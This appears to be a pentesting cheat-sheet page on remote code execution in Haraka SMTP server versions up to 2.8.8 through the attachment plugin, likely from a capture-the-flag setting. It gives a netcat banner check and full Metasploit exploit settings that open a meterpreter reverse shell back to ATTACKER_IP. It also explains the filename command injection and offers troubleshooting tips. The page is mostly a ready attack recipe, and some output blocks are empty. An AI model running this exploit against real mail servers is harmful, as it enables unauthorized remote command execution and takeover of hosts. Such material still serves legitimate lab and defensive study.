search
githubEdit

Haraka SMTP

Haraka is a Node.js SMTP server. Versions <= 2.8.8 with the attachment plugin enabled are vulnerable to RCE.

hashtag
Discovery

# Haraka typically runs on port 25 or 1025
nc TARGET 1025
# 220 redcross ESMTP Haraka 2.8.8 ready

hashtag
CVE: Haraka < 2.8.9 RCE via Attachment Plugin

Affected Versions: Haraka <= 2.8.8 with attachment plugin enabled

CVE: Not officially assigned, but tracked in Haraka GitHub PR #1606

hashtag
Exploit - Metasploit Module

More reliable than the Python script.

msfconsole

use exploit/linux/smtp/haraka
set RHOST TARGET
set RPORT 1025
set EMAIL_FROM [email protected]
set EMAIL_TO [email protected]
set SRVHOST ATTACKER_IP
set SRVPORT 8080
set LHOST ATTACKER_IP
set LPORT 9002
set PAYLOAD linux/x64/meterpreter/reverse_tcp

exploit

Example successful output:

hashtag
How the Exploit Works

  1. Exploit sends an email with a malicious ZIP attachment

  2. The ZIP filename contains shell metacharacters

  3. When Haraka's attachment plugin processes the ZIP, it executes the filename as a command

  4. This allows arbitrary command execution as the Haraka service user

hashtag
Troubleshooting

Python exploit errors:

Metasploit module fails:

  • Ensure your IP is whitelisted if a firewall is blocking connections

  • Try different payload types (staged vs stageless)

  • Check if wget/curl is available on target

hashtag
Post-Exploitation

Haraka runs as a specific user (often penelope, haraka, or mail).

hashtag
References

  • https://www.exploit-db.com/exploits/41162

  • https://github.com/haraka/Haraka/pull/1606

  • https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/smtp/haraka.md

PreviousGiteaNextphpLiteAdmin

Last updated